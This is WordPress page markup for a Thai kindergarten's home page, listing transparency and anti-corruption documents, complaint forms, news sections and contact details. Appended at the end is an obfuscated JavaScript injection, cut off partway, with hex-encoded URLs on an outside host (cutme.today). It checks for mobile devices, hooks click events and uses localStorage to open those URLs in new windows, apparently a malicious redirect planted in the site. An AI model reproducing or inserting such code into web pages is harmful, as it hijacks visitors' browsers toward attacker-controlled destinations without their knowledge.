gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 